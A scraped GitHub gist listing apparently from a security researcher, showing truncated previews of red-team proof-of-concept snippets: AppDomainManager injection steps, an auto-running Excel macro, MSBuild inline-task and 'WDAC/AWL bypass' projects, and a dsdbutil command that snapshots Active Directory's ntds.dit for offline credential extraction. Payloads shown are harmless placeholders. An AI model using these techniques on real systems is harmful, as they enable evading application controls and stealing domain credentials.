GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
bohops
/ fsharp.fsscript
Created
October 22, 2020 01:43
— forked from NickTyrer/fsharp.fsscript
fsi.exe inline execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
| open System.Management.Automation | |
| open System.Management.Automation.Runspaces | |
| open System | |
| let runSpace = RunspaceFactory.CreateRunspace() | |
| runSpace.Open() | |
| let pipeline = runSpace.CreatePipeline() |
bohops
/ ETW_Assembly_Load_Monitor.cs
Last active
September 26, 2022 23:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //A Quick POC for monitoring .NET Assembly Load Events with ETW | |
| // References: | |
| // - Microsoft CLR Provider: https://docs.microsoft.com/en-us/dotnet/framework/performance/clr-etw-providers | |
| // - ETW Assembly Load Events: https://docs.microsoft.com/en-us/dotnet/framework/performance/loader-etw-events | |
| // - Source Code Sample: https://github.com/microsoft/perfview/blob/master/src/TraceEvent/Samples/31_KernelAndClrMonitor.cs | |
| using Microsoft.Diagnostics.Tracing; | |
| using Microsoft.Diagnostics.Tracing.Parsers; | |
| using Microsoft.Diagnostics.Tracing.Session; | |
| using System; |
bohops
/ Excel_VBA_Macro_JScript
Created
September 2, 2020 20:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub Workbook_Open() | |
| RunMe | |
| End Sub | |
| Function RunMe() | |
| Dim ScriptEngine | |
| Set ScriptEngine = CreateObject("MSScriptControl.ScriptControl") | |
| ScriptEngine.Language = "JScript" | |
| ScriptEngine.Eval ("var shell = new ActiveXObject('WScript.Shell');shell.Popup('text');") | |
| End Function |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "pch.h" | |
| #define EXPORT extern "C" __declspec(dllexport) | |
| EXPORT void HelloWorld() | |
| { | |
| MessageBox(0, L"Hello World!", 0, 0); | |
| } | |
| BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) | |
| { |
bohops
/ _Instructions_Reproduce.md
Created
April 30, 2020 01:28
GhostLoader - AppDomainManager - Injection - 攻壳机动队
bohops
/ simple_msbuild.csproj
Created
August 17, 2019 17:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <UsingTask TaskName="HelloWorld" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"> | |
| <Task> | |
| <Code Type="Fragment" Language="cs"> | |
| <![CDATA[Console.WriteLine(":-) CSHARP :-)");]]> | |
| </Code> | |
| </Task> | |
| </UsingTask> | |
| <Target Name="Build"> | |
| <HelloWorld /> |
bohops
/ dsdbutil.exe
Last active
February 21, 2023 14:29
yet another native AD database extraction utility
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DSDButil | |
| ======== | |
| - dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)] | |
| - dsdbutil supports VSS snapshot creation | |
| - dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py) | |
| - Example #1: Using Snapshot GUID obtained from cmd output | |
| dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
| <Target Name="Hello" > | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
bohops
/ dotnetcore_msbuild_rosylyn_poc.csproj
Last active
June 12, 2020 14:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- dotnet.exe msbuild rosylyn_poc.csproj --> | |
| <!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Rosyln Compiler --> | |
| <Project DefaultTargets="Build"> | |
| <UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll"> | |
| <Task> | |
| <Code Type="Fragment" Language="cs"> | |
| <![CDATA[Console.WriteLine($":-) CSHARP :-)");]]> | |
| </Code> | |
| </Task> | |
| </UsingTask> |
bohops
/ gethelp.cs
Created
May 13, 2019 15:20
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |